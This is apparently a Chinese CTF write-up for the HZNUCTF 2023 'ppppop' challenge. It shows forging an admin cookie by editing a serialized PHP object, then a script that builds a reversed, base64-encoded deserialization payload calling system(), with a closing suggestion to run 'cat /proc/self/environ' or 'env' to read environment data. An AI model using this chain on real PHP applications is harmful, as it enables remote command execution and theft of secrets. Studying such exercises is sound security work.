(反序列化)[HZNUCTF 2023 preliminary]ppppop

(反序列化)[HZNUCTF 2023 preliminary]ppppop_第1张图片

打开是空页面

抓包发现cookies有东西

(反序列化)[HZNUCTF 2023 preliminary]ppppop_第2张图片

O:4:"User":1:{s:7:"isAdmin";b:0;}

(反序列化)[HZNUCTF 2023 preliminary]ppppop_第3张图片

将零改为1,放包得到题目页面

(反序列化)[HZNUCTF 2023 preliminary]ppppop_第4张图片

 className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}

编写payload

className = 'B';
$a->funcName = 'system';
$a->args = 'ls';

echo $payload = urlencode(base64_encode(strrev(serialize($a))));
?>

结果
fTsic2wiOjI6czsic2dyYSI6NDpzOyJtZXRzeXMiOjY6czsiZW1hTmNudWYiOjg6czsiQiI6MTpzOyJlbWFOc3NhbGMiOjk6c3s6MzoiQSI6MTpP

__call方法

(反序列化)[HZNUCTF 2023 preliminary]ppppop_第5张图片

strrev方法

反转字符

(反序列化)[HZNUCTF 2023 preliminary]ppppop_第6张图片

ls改成cat /proc/self/environ或者env即可

你可能感兴趣的:(web反序列化,php,web,学习)